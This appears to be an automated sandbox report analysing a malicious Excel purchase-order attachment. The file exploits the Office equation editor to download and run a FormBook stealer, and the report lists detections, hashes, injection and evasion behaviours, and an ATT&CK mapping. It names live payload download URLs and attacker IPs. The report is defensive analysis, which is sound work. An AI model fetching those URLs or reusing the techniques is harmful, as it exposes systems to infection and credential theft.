          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F23EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_00F23EC8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path Interception1
          Access Token Manipulation          		111
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts11
          Native API          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory151
          Security Software Discovery          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth33
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local Accounts22
          Exploitation for Client Execution          		Logon Script (Mac)Logon Script (Mac)512
          Process Injection          		NTDS2
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer121
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Scripting          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Obfuscated Files or Information          		DCSync116
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Software Packing          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626175 Sample: BON DE COMMANDE POUR CHENOU... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 26 2->16         started        process3 dnsIp4 43 103.156.91.153, 49171, 80 TWIDC-AS-APTWIDCLimitedHK unknown 11->43 37 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 69 Office equation editor establishes network connection 11->69 71 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->71 18 vbc.exe 19 11->18         started        41 ~$BON DE COMMANDE POUR CHENOUFI AEK.xlsx, data 16->41 dropped file5 signatures6 process7 file8 35 C:\Users\user\AppData\Local\Temp\bmexo.exe, PE32 18->35 dropped 53 Machine Learning detection for dropped file 18->53 22 bmexo.exe 18->22         started        signatures9 process10 signatures11 55 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 59 Injects a PE file into a foreign processes 22->59 25 bmexo.exe 22->25         started        process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 25->61 63 Maps a DLL or memory area into another process 25->63 65 Sample uses process hollowing technique 25->65 67 Queues an APC in another process (thread injection) 25->67 28 explorer.exe 25->28 injected process14 process15 30 chkdsk.exe 28->30         started        signatures16 73 Modifies the context of a thread in another process (thread injection) 30->73 75 Maps a DLL or memory area into another process 30->75 77 Tries to detect virtualization through RDTSC time measurements 30->77 33 cmd.exe 30->33         started        process17

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          BON DE COMMANDE POUR CHENOUFI AEK.xlsx38%VirustotalBrowse
          BON DE COMMANDE POUR CHENOUFI AEK.xlsx27%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          6.0.bmexo.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.bmexo.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.bmexo.exe.170000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.bmexo.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.bmexo.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exej0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exes0%Avira URL Cloudsafe
          http://103.156.91.153/fdcloudfiles/vbc.exe11%VirustotalBrowse
          http://103.156.91.153/fdcloudfiles/vbc.exe100%Avira URL Cloudmalware
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.freerenoadvice.com/ud5f/100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exehhC:0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://103.156.91.153/fdcloudfiles/vbc.exetrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown
          www.freerenoadvice.com/ud5f/true
          • Avira URL Cloud: malware
          		low

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
            		high
            http://investor.msn.comexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
              		high
              http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                		high
                http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://www.piriform.com/ccleanerqexplorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://103.156.91.153/fdcloudfiles/vbc.exejEQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drfalse
                      		high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        		high
                        http://treyresearch.netexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://103.156.91.153/fdcloudfiles/vbc.exesEQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          		high
                          http://java.sun.comexplorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                            		high
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://investor.msn.com/explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		low
                                  http://www.%s.comPAexplorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		low
                                  http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.mozilla.orgexplorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://103.156.91.153/fdcloudfiles/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.156.91.153
                                        		unknownunknown
                                        		134687TWIDC-AS-APTWIDCLimitedHKtrue

                                        General Information

                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:626175
                                        Start date and time: 13/05/202217:06:212022-05-13 17:06:21 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Sample file name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@11/16@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 35.9% (good quality ratio 34.6%)
                                        • Quality average: 75%
                                        • Quality standard deviation: 28.2%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 110
                                        • Number of non-executed functions: 73
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.182.143.212
                                        • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:07:42API Interceptor89x Sleep call for process: EQNEDT32.EXE modified
                                        17:07:55API Interceptor61x Sleep call for process: bmexo.exe modified
                                        17:08:28API Interceptor220x Sleep call for process: chkdsk.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        103.156.91.153MRC DIRECT ORDER LEBANON.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153/cloudfile/vbc.exe
                                        Energe 1,010.00.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153/__cloud_for_file/vbc.exe
                                        5P22020005-MEDUK1317768_CBL02.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153/365space/vbc.exe
                                        BON DE COMMANDE--BCA2200710.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153/msdrive10/vbc.exe

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        TWIDC-AS-APTWIDCLimitedHKMRC DIRECT ORDER LEBANON.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153
                                        Energe 1,010.00.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153
                                        5P22020005-MEDUK1317768_CBL02.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153
                                        9knJQfYMP8Get hashmaliciousBrowse
                                        • 103.154.221.88
                                        BON DE COMMANDE--BCA2200710.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.153
                                        fjqwmhHmzvGet hashmaliciousBrowse
                                        • 103.153.254.67
                                        https://cwerujnfocvhi3w4-hgfv9io3wrehnv-gp093rhgv3r4v.obs.af-south-1.myhuaweicloud.com/vnoiruhgv0-p39ehrgvb-0p9he3r-0bvpg9he4t-09bg.html?AWSAccessKeyId=BIYYVE07OMDKEILTTF0R&Expires=1653564383&Signature=4e6EXLQcv1xcMfrEkMEdfz05gIw%3D#Get hashmaliciousBrowse
                                        • 103.153.183.146
                                        https://cwerujnfocvhi3w4-hgfv9io3wrehnv-gp093rhgv3r4v.obs.af-south-1.myhuaweicloud.com/vnoiruhgv0-p39ehrgvb-0p9he3r-0bvpg9he4t-09bg.html?AWSAccessKeyId=BIYYVE07OMDKEILTTF0R&Expires=1653564383&Signature=4e6EXLQcv1xcMfrEkMEdfz05gIw%3D#louis@weighpack.comGet hashmaliciousBrowse
                                        • 103.153.183.146
                                        NEW QUOTATION.docGet hashmaliciousBrowse
                                        • 103.153.76.136
                                        VJAGa1CbxAGet hashmaliciousBrowse
                                        • 103.157.99.19
                                        sora.arm7Get hashmaliciousBrowse
                                        • 103.157.51.70
                                        JWvorA813EGet hashmaliciousBrowse
                                        • 103.153.150.146
                                        NANSHA -CHINA 2.docGet hashmaliciousBrowse
                                        • 103.153.76.136
                                        order_april_30042022_000000000000000000.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.63
                                        cxgIVwyGAOGet hashmaliciousBrowse
                                        • 103.153.150.167
                                        sora.arm7Get hashmaliciousBrowse
                                        • 103.157.99.61
                                        1isequal9.x86Get hashmaliciousBrowse
                                        • 154.211.10.101
                                        Ghatge Patil Industries Ltd.xlsxGet hashmaliciousBrowse
                                        • 103.156.90.79
                                        #Uc820#Ud22c#Uc6e8#Uc774#Ube0c #Ubc1c#Uc8fc#Uc11c_2022#Uc77c#Uc2e0#Ud14c#Ud06c.xlsxGet hashmaliciousBrowse
                                        • 103.156.91.63
                                        PO_SBL#0026.xlsxGet hashmaliciousBrowse
                                        • 103.156.90.79

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

                                        Download File
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):263783
                                        Entropy (8bit):7.9127214183326275
                                        Encrypted:false
                                        SSDEEP:3072:LODZGPEounb6dFqeTHg1WG3Tpf8o7j8kRSLCXD35Zq66TvNJsd19vQ1/A3wCEGj7:LOtIO6RsBTpfD7lRVq6uJM194uLiC87i
                                        MD5:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        SHA1:A4BEACE30EF4B975E247AFBAF837E757A5372F7E
                                        SHA-256:039EF59E7502A98D0B9A6A7E7818444F6DBD699A4CDB10A8DBA031222CFDDE6F
                                        SHA-512:28C4CAC036B93D8943D42613DC8C703A66D291393760524C22E0FCD76E7B67CE73E40704C29321E42765364638F0EE3C11AF52922700570BA47AB661B846A7F7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        IE Cache URL:http://103.156.91.153/fdcloudfiles/vbc.exe
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71EFD22C.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...

                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD6B8317.wmf

                                        Download File
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
